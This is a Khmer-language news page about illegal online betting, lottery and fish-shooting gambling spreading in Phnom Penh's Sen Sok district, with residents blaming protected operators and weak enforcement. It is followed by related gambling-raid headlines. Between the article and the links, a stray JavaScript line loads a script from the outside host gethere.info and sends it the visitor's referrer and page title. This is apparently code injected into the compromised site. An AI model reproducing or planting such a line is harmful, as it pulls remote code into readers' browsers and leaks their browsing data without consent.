ហ្គេមអនឡាញបង្កប់ល្បែងភ្នាល់ និងល្បែងស៊ីសងគ្រប់ប្រភេទក្នុងខណ្ឌសែនសុខ កំពុងរាលដាល គួរអោយព្រួយបារម្មណ៍យ៉ាងខ្លាំង!

2 ខែ មុន 187 តូ សុផល

ភ្នំពេញ៖ ប្រជាពលរដ្ឋបានលើកឡើងថាពួកគាត់រស់ នៅខណ្ឌសែនសុខ  កំពុងតែមានការព្រួយបារម្មណ៍យ៉ាងខ្លាំង ពីបញ្ហាសន្តិសុខ សង្គម ដោយមាន អំពើចោរកម្ម លួចប្លន់ ឆក់ គ្រឿងញៀន កើតមាន ជាបន្តបន្ទាប់ ដោយ អាជ្ញាធរ និងសមត្ថកិច្ចខណ្ឌ ខំបង្ក្រាបដែរតែហាក់បីមិនទាន់ចំគោលដៅ និងទទួលបានជោកជ័យនៅឡើយ។

ប្រជាពលរដ្ឋ បានឲ្យដឹងថា អំពើចោរកម្មទាំងនោះ អាចបណ្ដាល មកពីកើតមាន ល្បែងស៊ីសងដែលកើតមាន នៅខណ្ឌសែនសុខយ៉ាងពេញបន្ទុក ដូចជា ៖ ហ្គេមអនឡាញបង្កប់ល្បែងភ្នាល់គ្រប់ប្រភេទ ល្បែងកន្ទុយលេខ (ឆ្នោតយួន) បៀរអាប៉ោង ល្បែងភ្នាល់ទឹកភ្លៀង និងហ្គេមបាញ់ត្រីជាដើម។

មានការអះអាងបន្ថែមថា កងកម្លាំង សមត្ថកិច្ច តែងតែ ចុះធ្វើការ បង្ក្រាបនូវវង់ល្បែង ទីតាំងល្បែងនានា ក្នុងខណ្ឌសែនសុខ តាមបញ្ជារបស់ថ្នាក់ដឹកនាំដែរ ប៉ុន្តែការ ចុះបង្ក្រាបម្ដងៗ សមត្ថកិច្ចដែលខំអនុវត្ត ទាំងនោះត្រូវបានមេកើយ ស្ដីបន្ទោស និងអន្តរាគមន៍ទៅវិញ ដោយមានការ ប៉ះពាល់ចំខ្សែរអ្នកមាន អំណាចបុណ្យស័ក្ក នៅ កាងពីក្រោយខ្នង របស់ទីតាំងល្បែងនីមួយៗ។

លោក សាំង សុភៈវិចិត្រ អភិបាលរងខណ្ឌសែនសុខធ្លាប់និយាយដោយចំហថា មិនហ៊ានបង្ក្រាបទាំងអស់នោះទេ ព្រោះទីតាំងហ្គេមបង្ក្រប់ល្បែងស៊ីសងមួយចំនួនខាងលើមានខ្នងធំៗណាស់។

ល្បែងហ្គេមអនឡាញ និងល្បែងគ្រប់ប្រភេទ ត្រូវបានប្រជាពលរដ្ឋ ក្នុងខណ្ឌសែនសុខ  ឲ្យដឹងថាកំពុងរាល ដាលយ៉ាងពេញបន្ទុក ហើយពលរដ្ឋមួយចំនួន ដែលឈ្លក់វង្វេង នឹងល្បែងនេះ ត្រូវចាញ់អស់ ទ្រព្យសម្បត្តិលុយកាក់ ហើយអ្នកខ្លះ ឈានដល់អស់ដីធ្លីផ្ទះសម្បែងទៀតផង ឯក្មេងៗសិស្សនុសិស្សខ្លះក៍មកសំកុងលេងតែហ្គេមអនឡាញដែរ ចំណែកយុវជនមួយចំនួនក៍មិនបានប្រកបមុខរបរអីដែររវល់តែវង្វេង និងល្បែងភ្នាល់ ហ្គេមបាញ់ត្រី និងមានអ្នកខ្លះជក់ថ្នាំថែមទៀតផង។

អាជ្ញាធរសង្កាត់ ខណ្ឌ  ក៏ដូចជានគរបាលប៉ុស្ដិ៍ រដ្ឋបាលតាមបណ្ដាសង្កាត់នានា មិនយកចិត្តទុកដាក់បង្ក្រាប ល្បែងស៊ីសងឲ្យស្របទៅតាម គោលនយោបាយភូមិ-ឃុំ មានសុវត្ថិភាព ទាំង៩ចំណុចនោះទេ ហើយបណ្ដោយ ឲ្យល្បែងស៊ី សង រាលដាលកាន់តែខ្លាំង មិនអនុវត្តន៍តាមអនុសាសន៍  សម្តេចក្រឡាហោម ស ខេង កាលពីថ្ងៃទី២៦ ខែតុលា ឆ្នាំ២០១៦ នៅទីស្តីក្រសួងមហាផ្ទៃ ថា ” ចំពោះល្បែងស៊ីសងខុសច្បាប់ ដែលបានលប លួចបើក និងបានបើកជាចំហរ នៅតាមបណ្តាមូលដ្ឋានមួយចំនួន កន្លងមកនោះដូចជា៖ ល្បែងជ្រក ក្រោមស្លាកល្បែងស្របច្បាប់ ឆ្នោត ឡូតូ ភ្នាល់បាល់ ភ្នាល់អនឡាញ ល្បែងអ៊ិនធឺណេត ២៤ម៉ោង ឆ្នោតកន្ទុយលេខ ល្បែងជល់ មាន់ ល្បែងភា្នល់ ទឹកភ្លៀង ល្បែងបាញ់ត្រី និងល្បែងនានា ដែលជ្រកក្រោមល្បែង ក្មេងលេង និងទាំងអាជីវកម្មខុសច្បាប់ គឺត្រូវបានប្រកាសបិទទាំងស្រុង”។ 

ប្រជាពលរដ្ឋ បានលើកឡើងថា ពួកគាត់ចង់ឃើញ និងសង្ឃឹមថា អាជ្ញាធរ សមត្ថកិច្ច អនុវត្តបង្ក្រាបល្បែង ស៊ីសង ឲ្យដូចភ្លៀងរលឹម ដើម្បីរក្សាសន្តិសុខ សណ្ដាប់ធ្នាប់ សង្គមសុវត្ថិភាព ជូនប្រជាពលរដ្ឋ កុំធ្វើតែមួយឆាវៗ ដូចភ្លើងចំបើង៕

ជុំវិញករណីនេះ លោក បុឹល កុសល អភិបាលខណ្ឌសែនសុខធ្លាប់ច្រានចោលនូវពាក្យចោទប្រកាន់របស់សារព័ត៌ មានមួយចំនួនដែលបានលើកឡើង  “លោកធ្លាប់សន្យាថា និងបោសសំអាតល្បែងស៊ីសងគ្រប់ប្រភេទអោយអស់ពីក្នុងមូលដ្ឋាន”។  លោកបញ្ជាក់ថា លោកមិនធ្លាប់និយាយ  ឬសន្យានដូចការលើឡើងនោះឡើយ!។

ក្នុងនាមជាប្រធានគណៈអភិបាលខណ្ឌមួយទាំងមូលហេតុអ្វីមិនហ៊ានសន្យា  និងចូលរួមអនុវត្តន៍គោលនយោ បាយភូមិ-សង្កាត់មានសុវត្ថិភាពដែលប្រមុខរាជរដ្ឋាភិបាលដាក់ចេញមក?

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អាន៖  កម្លាំងនគរបាលខេត្តប៉ៃលិន បង្ក្រាបបានជនសង្ស័យ ៤នាក់ ដែលយកដុំថ្មគប់ទៅលើអ្នកធ្វើដំណើរតាមដងផ្លូវជាតិលេខ៥៧

 

 

អនុសាសន៍ សម្តេចក្រឡាហោម ស ខេង ហាក់គ្មានប្រសិទ្ធិភាព ខណៈ ល្បែងស៊ីសងភ្នាល់ចាក់បាល់ និងហ្គេមអិនធឺណិត កំពុងរីកដូចផ្សិត ក្នុងក្រុងបាត់ដំបង

3 ថ្ងៃ មុន 773 តូ សុផល

អាវុធហត្ថសៀមរាប ដោះលែងអ្នកលេងល្បែង២២នាក់ ម្ចាស់ទីតាំង២នាក់បញ្ជូនទៅតុលាការ

1 សប្តាហ៍ មុន 116 តូ សុផល

ល្បែងអាប៉ោង ជល់មាន់ស្រុកព្រះនេត្រព្រះ អធិការស្រុកមិនយកភ្នែកមើល ប្រជាពលរដ្ឋស្នើសូមលោក អាត់​ ខែម ស្នងការខេត្តបន្ទាយមានជ័យមានវិធានការ

3 សប្តាហ៍ មុន 454 វីជ្ជា ស្លាប់រស់ជារឿងធម្មតា​

ភ្លេចៗខ្លួន ហ្គេមអនឡាញបង្កប់ល្បែងភ្នាល់គ្រប់ប្រភេទ បើកវិញអស់ហើយ!

3 សប្តាហ៍ មុន 445 តូ សុផល

តិចសែនព្រេនមិនត្រូវ ចុះបង្ក្រាបសង្វៀនជល់មាន់ដុះស្លែនៅសង្កាត់ទឹកថ្លា ឃាត់មនុស្ស១៤នាក់ VIDEO

3 សប្តាហ៍ មុន 384 តូ សុផល

ចូលឆ្នាំចិនថ្ងៃទី១ បង្ក្រាបគ្រឿងញៀននៅត្រពាំងឈូក ឃាត់មនុស្ស៦នាក់ រឺបអូសទូហ្គេមបាញ់ត្រី១ទូ VIDEO

4 សប្តាហ៍ មុន 422 តូ សុផល

ជនសង្ស័យជួញដូរថ្នាំញៀន ២នាក់ រួមទាំងថ្នាំញៀន ១២០កញ្ចប់តូច ត្រូវបានបង្រ្កាប និងដកហូត

1 ខែ មុន 80 តូ សុផល

ចាំមើលលោកតេង ស៊ីណូ បានតែថាឬក៏ហ៊ានជាមួយទីតាំងជល់មាន់ និងវង់អាប៉ោងដុះស្លែក្នុងភូមិត្នោតជ្រុំ៤

1 ខែ មុន 779 វីជ្ជា ស្លាប់រស់ជារឿងធម្មតា​

Update: មនុស្សចំនួន១៥នាក់ត្រូវកម្លាំងព្រហ្មទណ្ឌកំរិតធ្ងន់ចុះបង្ក្រាបក្នុងសង្វៀនជល់មាន់នៅខណ្ឌពោធិ៍សែនជ័យ VIDEO

1 ខែ មុន 408 វីជ្ជា ស្លាប់រស់ជារឿងធម្មតា​

Breaking News: កម្លាំងព្រហ្មទណ្ឌកំរិតធ្ងន់ចុះបង្ក្រាបសង្វៀនជល់មាន់មួយកន្លែងនៅសង្កាត់សង្កាត់ចោមចៅ

1 ខែ មុន 729 វីជ្ជា ស្លាប់រស់ជារឿងធម្មតា​
TOP
 

ទំនាក់ទំនង

លេខទូរសព្ទ័: 0963899997, 017987600 ម៉ោងធ្វើការ: ចន្ទ័ - សុក្រ (8am - 5pm) អុីមែល: info@tnn-news.com

បណ្តាញសង្គម